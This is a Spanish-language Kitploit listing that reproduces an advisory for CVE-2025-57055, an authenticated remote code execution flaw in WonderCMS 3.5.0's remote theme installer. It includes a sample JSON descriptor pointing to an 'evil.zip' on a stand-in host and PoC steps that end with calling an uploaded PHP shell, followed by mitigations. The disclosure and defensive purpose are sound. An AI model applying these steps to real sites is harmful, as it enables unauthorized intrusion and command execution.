Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57055 — Exploit de RCE autenticado para WonderCMS 3.5.0 mediante instalación de temas maliciosos. Incluye mecánica de vulnerabilidad, PoC y guía de mitigación para pruebas de seguridad y educación. | Kitploit
Herramientas/GitHubGitHub/thawphone/cve-2025-57055
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubthawphone/cve-2025-57055

CVE-2025-57055

Exploit de RCE autenticado para WonderCMS 3.5.0 mediante instalación de temas maliciosos. Incluye mecánica de vulnerabilidad, PoC y guía de mitigación para pruebas de seguridad y educación.

Ver Repositorio
hace 0 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-57055: Ejecución remota de código autenticada en WonderCMS 3.5.0

Mecánica de la vulnerabilidad

Existe una vulnerabilidad de ejecución remota de código (RCE) autenticada en WonderCMS v3.5.0.

El problema surge de cómo la aplicación maneja las instalaciones remotas de temas/módulos mediante descriptores JSON. Cuando un administrador envía un archivo JSON remoto que hace referencia a un archivo ZIP, su contenido se extrae a un directorio accesible desde la web (p. ej., /themes/). Si el ZIP contiene un archivo PHP, ese archivo se vuelve accesible a través de la web y puede ejecutarse.

Este comportamiento introduce riesgo de RCE debido a:

  • Falta de validación o saneamiento del contenido del ZIP.
  • Sin restricción de tipos de archivo extraídos de fuentes remotas.
  • Accesibilidad web de los directorios de temas/plugins.

Nota: Se requiere autenticación de administrador, pero las instalaciones predeterminadas exponen la contraseña de administrador públicamente (en la página de inicio), utilizan un inicio de sesión solo con contraseña y no aplican controles de autenticación sólidos.

Criterios de aceptación para descriptores remotos de módulos/temas

WonderCMS aceptará e intentará instalar módulos/temas remotos si el descriptor JSON enviado coincide con el formato esperado . Un descriptor que pase la comprobación de formato (y apunte a un archivo ZIP) será recuperado y el contenido de su archivo se extraerá a un directorio accesible desde la web (p. ej., ) sin validación adicional de los tipos de archivo.

wcms-modules.json
/themes/<name>/

Descriptor de ejemplo:

root@kitploit:~
{
  "themes": {
    "SSRF": {
      "name": "FAKE",
      "repo": "https://example.com/",
      "zip": "https://example.com/evil.zip",
      "summary": "test",
      "version": "1.0.0",
      "image": "https://example.com/fake.png"
    }
  }
}

Prueba de concepto (PoC)

Advertencia: No ejecutar en sistemas de producción. Utilizar únicamente entornos de prueba autorizados.

  1. Obtenga la contraseña de administrador de la página de inicio expuesta públicamente de una instalación predeterminada de WonderCMS.

  2. Inicie sesión en el panel de administración.

  3. Navegue hasta la sección de instalación de temas.

  4. Proporcione la URL de un descriptor JSON malicioso (p. ej., alojado en un servidor controlado por el atacante).

  5. Inicie la instalación. El servidor hará lo siguiente:

  • Recuperar el descriptor.
  • Descargar el archivo ZIP especificado.
  1. Instale el tema malicioso descargado.

  2. Acceda al shell PHP extraído (p. ej., http://target.com/themes/<Theme_Name>/shell.php) para ejecutar comandos arbitrarios.

(Nota: Realice estos pasos únicamente en un entorno de prueba controlado. Explotar esta vulnerabilidad en sistemas en producción sin autorización es ilegal).

Respuesta del proveedor

  • La vulnerabilidad se informó a los mantenedores de WonderCMS en julio de 2025.

  • Los mantenedores reconocieron el informe pero señalaron que, en su opinión, este comportamiento es aceptable para los administradores.

Guía de mitigación

Para reducir la exposición:

  • Restrinja las capacidades de instalación remota a fuentes confiables (p. ej., solo GitHub).
  • Valide y sane el contenido del ZIP antes de extraerlo.
  • Refuerce la autenticación:
    • Oculte la contraseña de administrador después de la instalación.
    • Exija inicio de sesión con usuario/contraseña.
    • Habilite la autenticación multifactor (si está disponible).
  • Impida el acceso a archivos ejecutables dentro de themes/ o plugins/ mediante la configuración del servidor.

Referencias

  • WonderCMS GitHub
  • OWASP A05:2021 – Configuración incorrecta de seguridad
  • CWE-434 – Carga sin restricciones de un archivo con tipo peligroso

Aviso legal

Esta información se proporciona con fines defensivos de investigación en seguridad y educativos. Obtenga siempre la autorización adecuada antes de probar o divulgar vulnerabilidades.

Descargar herramienta